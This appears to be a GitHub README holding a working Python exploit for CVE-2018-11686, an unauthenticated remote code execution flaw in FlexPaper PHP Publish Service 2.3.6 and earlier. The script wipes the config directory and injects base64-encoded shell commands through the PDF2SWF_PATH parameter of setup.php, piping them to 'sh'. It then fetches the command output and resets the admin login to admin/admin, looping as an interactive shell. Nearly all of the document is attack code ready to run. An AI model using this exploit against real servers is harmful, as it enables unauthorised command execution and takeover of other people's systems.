README.md
Rendering markdown...
import base64
import requests
import sys
import re
remote = "http://127.0.0.1:8888"
ressource = "/flexpaper"
proxy = {
'http': "http://127.0.0.1:8080"
}
if __name__ == "__main__":
print("\nCVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6\n")
print("[+] Checking if ressource available =>", end=' ')
burp0_url = remote + ressource + "/php/change_config.php"
r = requests.get(burp0_url, proxies=proxy, verify=False, allow_redirects=False)
if r.status_code == 302:
print("\033[92mOK\033[0m")
else:
print("KO")
sys.exit()
while True:
try:
command = input("command (\033[92mreflected\033[0m)> ")
if command == "exit":
print("Exiting...")
break
command = base64.b64encode(command.encode('utf-8'))
command_str = command.decode('utf-8')
command_str = command_str.replace('/', '+')
print("[+] Cleaning config directory =>", end=' ')
burp0_url = remote + ressource + "/php/change_config.php"
burp0_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"SAVE_CONFIG": "1", "PDF_Directory": "a", "SWF_Directory": "config/",
"LICENSEKEY": "a", "SPLITMODE": "a", "RenderingOrder_PRIM": "a", "RenderingOrder_SEC": "a"}
r = requests.post(burp0_url, proxies=proxy, data=burp0_data,
verify=False, allow_redirects=False)
r = requests.post(burp0_url, proxies=proxy, data=burp0_data,
verify=False) # little hack
if r.status_code == 200 and "index.php?msg=Configuration%20saved!" in r.url:
print("\033[92mOK\033[0m")
else:
print("KO")
sys.exit()
print("[+] Executing command =>", end=' ')
burp0_url = remote + ressource + \
"/php/setup.php?step=4&PDF2SWF_PATH=echo+" + \
command_str + "+|+base64+-d+|+sh+>config/output.txt%3b"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
requests.get(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=True)
if "index.php" in r.url:
print("\033[92mOK\033[0m")
else:
print("KO")
sys.exit()
print("[+] Getting result =>", end=' ')
burp0_url = remote + ressource + "/php/config/output.txt"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=False)
if r.status_code == 200:
print("\033[92mOK\033[0m")
print(r.text)
else:
print("KO")
sys.exit()
print("[+] Reset config of FlexPaper =>", end=' ')
burp0_url = remote + ressource + \
"/php/setup.php?step=4"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"ADMIN_USERNAME": "admin", "ADMIN_PASSWORD": "admin"}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data,
proxies=proxy, verify=False, allow_redirects=True)
if r.status_code == 200:
print("\033[92mOK\033[0m")
else:
print("KO")
sys.exit()
except KeyboardInterrupt:
print("Exiting...")
break